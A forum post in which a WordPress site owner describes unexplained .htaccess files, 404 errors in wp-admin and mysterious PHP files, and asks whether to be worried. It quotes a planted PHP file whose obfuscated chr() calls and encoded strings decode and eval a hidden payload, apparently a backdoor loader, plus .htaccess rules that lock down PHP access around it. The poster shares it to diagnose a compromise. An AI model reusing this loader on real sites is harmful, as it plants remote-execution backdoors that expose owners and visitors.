I have a question similar to what is said in this unanswered topic here :
There is an unwanted .htaccess file with "Order Allow,Deny" in all my wordpress subfolders
with some of this one here :
Admin links shows 404 WordPress
Meaning that I found different unwanted htaccess files (or rather, files that I don't recall placing there) in the different wordpress folders in my Cpanel file manager. I don't know if it's related, but when I access the wp-admin of different websites I can't get to plugins interface or media from the dashboard because I get a 404 not found. Some files are written like "htaccess.ht" or "htaccess.bk" and look like this :
RewriteEngine OnRewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]RewriteBase /RewriteRule ^index\.php$ - [L]RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule . /index.php [L]Or like this :
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$"\>Order allow,denyDeny from all</FilesMatch><FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$"\>Order allow,denyAllow from all</FilesMatch><IfModule mod_rewrite.c>RewriteEngine OnRewriteBase /RewriteRule ^index.php$ - [L]RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule . index.php [L]</IfModule>It doesn't look too much of a threat, but it still begs the question...
Stranger than that, different php files with different names have appeared all around, with always the same code inside :
<?php $co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); $na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); $ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); $AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d"; $AmineDns = "=UvmLf1PNqJF8Isk5oJJuCJbUnKE6V8MRlbdTH+LGS1rsNXfL7l+n7Z/zCc/0x76Pb1S4Q1gnj2KXGz/67Id57kEDyc1UpM29Srl73G1iNKDVNmu7vb7KPTX1aFGuy1qdMbXq2KT3Mvry4TdSwScm1FI4ybP1C1NMqU4iVsCWrvML+PbemQVOpQ5WlDCgHIEr7ZEbVBmpjAGy7IQXGT8XiUlC2q8XcDgRViOGxnYZuAk7ADk8C+gCMl7PC9uHb3PKh96n88SVENqonNW/EHNrC2Rq4wrfCiJY+UaAYFm0ug+o/MgNITG3hZaGicIMZr7WoQqam/s1YOlD3L5CMdMzq7gaQmvzeW6AMZB2zDB0OM+AY6CnGgqi5C6RwUJSe3WqQmkntsbUehG418D7s3O7MTO4RQkO9O8RKn0UrwQAKXgmSDatIGpPsqaE4CpJi0II1ktawUF8DBUC702QVFn45PoB8VA";/*2e3300cd40ea092e5eeb579abe01e85a*/ eval($co($ro($na($AmInE)))); exit; ?>when I UnPhp it it gives me the information below
So far :
- I've tried to use WP_DEBUG but I didn't get any messages related to the 404 error...
- I cannot add plugins to search for errors because well... I get a 404 when trying to get to the "add plugin" menu.
- I've tried getting rid of the unwanted htaccess files and making a new one by going in Tools > Permalinks > Save.
- In the error_log, I have several attempts of the wp_privacy_delete_old_export_files function that couldn't be sent..
- I've tried to update everything and reinstall wordpress's latest version, but I also got an error
- I've checked the wp-config file, plugin-install.php file... but found nothing unusual... Worst part is, all my plugins work perfectly I just.. Can't reach any dashboard and nothing works...
My question is this : should I be worried ? If it's a Mod_rewrite problem, I've already contacted Cpanel's support and all should be fixed. But still, if anyone can provide me with any information on the issue, it would be really nice of them !
Thank you for taking the time to read